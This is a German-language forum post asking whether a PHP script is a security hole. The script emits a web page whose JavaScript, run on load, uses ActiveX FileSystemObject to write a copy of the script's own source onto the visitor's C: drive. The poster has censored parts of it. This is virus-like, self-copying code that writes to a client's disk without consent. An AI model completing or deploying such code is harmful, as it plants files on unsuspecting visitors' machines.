PHP Sicherehitslücke?
Hi!
Also, ich habe vor einiger Zeit einmal einen Script geschrieben, und damit kann man via Server auf die Daten des Clients zugreifen.
Ist das eine Sicherheitslücke oder soll das erlaubt sein?
Hier eine (zensierte) Ausgabe des PHP Codes: PHP-Code:
<?
$nl=chr(13).chr(10);
echo '<html><head>';
echo '<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 'function go(){'.$nl;
echo 'var fso=new
ActiveXObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.$nl;
echo 'var file=fso.CreateTextFile('.chr(34).'C:\\\spth.php'.chr(34).')'.$nl;
$cont=fread(fopen (__FILE__, 'r'),filesize(__FILE__));
$i=0;$nc='';
echo 'file.Write(';
while ($i<strlen($cont)){
echo 'String.[ZENSIERT]Code('.ord($cont{ZENSIERT}).')+';
$i++;
}
echo chr(34).chr(34).')'.$nl;
echo 'file.Close()}'.$nl;
echo '</script></head>';$nl.$nl;
?>
<body language="JavaScript" onload="ZENSIERT()"></body></html>
grüsse, Mario | 